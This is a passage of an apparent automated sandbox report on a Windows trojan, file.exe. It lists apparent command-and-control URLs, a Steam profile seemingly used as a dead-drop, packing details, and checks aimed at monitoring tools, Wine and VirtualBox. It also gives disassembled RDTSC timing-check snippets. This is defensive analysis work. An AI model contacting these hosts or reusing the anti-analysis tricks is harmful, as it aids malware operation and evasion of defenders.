    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/api
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/ER
    Source: file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiJ
    Source: file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiX
    Source: file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apit
    Source: file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apitory
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api%
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/api
    Source: file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/K)
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/lin
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900S)
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-man
    Source: file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manqqx
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49719 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995681208745875
    Source: file.exeStatic PE information: Section: achgldqf ZLIB complexity 0.9941400277140673
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7352
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b35a00f7-448e-4f05-b05e-a590b91281a2Jump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeVirustotal: Detection: 53%
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 1844224 > 1048576
    Source: file.exeStatic PE information: Raw size of achgldqf is bigger than: 0x100000 < 0x198c00

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;achgldqf:EW;oujhmehu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;achgldqf:EW;oujhmehu:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1cea7a should be: 0x1ca74a
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: achgldqf
    Source: file.exeStatic PE information: section name: oujhmehu
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.978134199396537
    Source: file.exeStatic PE information: section name: achgldqf entropy: 7.953550554891692

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70419F second address: 703A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D28DAh], ecx 0x0000000d jnc 00007F2CB4F0745Ch 0x00000013 push dword ptr [ebp+122D01F1h] 0x00000019 jmp 00007F2CB4F07463h 0x0000001e call dword ptr [ebp+122D1B62h] 0x00000024 pushad 0x00000025 jns 00007F2CB4F0745Ch 0x0000002b xor dword ptr [ebp+122D2F83h], ebx 0x00000031 xor eax, eax 0x00000033 pushad 0x00000034 and cx, 9E5Eh 0x00000039 or cl, 00000071h 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 or dword ptr [ebp+122D2F83h], esi 0x00000047 mov dword ptr [ebp+122D388Dh], eax 0x0000004d stc 0x0000004e mov esi, 0000003Ch 0x00000053 cld 0x00000054 mov dword ptr [ebp+122D3582h], eax 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e pushad 0x0000005f mov al, dh 0x00000061 push eax 0x00000062 or dword ptr [ebp+122D2642h], ecx 0x00000068 pop edi 0x00000069 popad 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+122D3582h], edi 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 jne 00007F2CB4F0745Ch 0x0000007c or dword ptr [ebp+122D3582h], esi 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 or dword ptr [ebp+122D35F9h], eax 0x0000008c push eax 0x0000008d push edi 0x0000008e pushad 0x0000008f jng 00007F2CB4F07456h 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF40 second address: 86FF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF48 second address: 86FF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF4D second address: 86FF68 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2CB4E5A4CEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jng 00007F2CB4E5A4C6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F2CB4E5A4C6h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF68 second address: 86FF8B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CB4F07456h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F2CB4F0745Ch 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 jl 00007F2CB4F07456h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CB0F second address: 87CB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2CB4E5A4C6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CB1B second address: 87CB35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CB35 second address: 87CB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CF5C second address: 87CF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D350 second address: 87D35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2CB4E5A4C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D35A second address: 87D39E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2CB4F07466h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F2CB4F07467h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
